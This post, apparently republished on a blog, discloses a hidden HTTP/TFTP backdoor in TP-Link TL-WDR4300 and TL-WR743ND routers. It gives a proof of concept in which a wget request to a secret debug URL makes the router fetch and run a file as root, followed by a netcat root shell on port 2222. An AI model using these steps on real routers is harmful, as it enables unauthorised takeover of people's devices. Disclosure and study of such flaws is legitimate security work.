TP-Link HTTP/TFTP Backdoor



TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.



tp-logo

Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):



firmware_version
TL-WDR4300 – tested firmware version

The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.

Proof of Concept

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

[ <=> ] 426 --.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd]
3 root SW< [ksoftirqd/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [async/mgr]
7 root SW< [kblockd/0]
8 root SW [pdflush]
9 root SW [pdflush]
10 root SW< [kswapd0]
17 root SW< [mtdblockd]
18 root SW< [unlzma/0]
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW< [napt_ct_scan]
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

The router downloads a file (nart.out) from the host which has issed the http request and executes is as root:

tp-link-diag-400x214
PoC – diagram

Sample captures from the host which issues the http request:

wireshark_tmp-400x122
Wireshark filter used to show router tftp traffic

wireshark1-400x103
nart.out tftp request

Models affected
  • TL-WDR4300
  • TL-WR743ND (v1.2 v2.0)
History of the bug

12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure

Penulis : Unknown ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel TP-Link HTTP/TFTP Backdoor ini dipublish oleh Unknown pada hari Friday, December 20, 2013. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan TP-Link HTTP/TFTP Backdoor
 

0 comments:

Post a Comment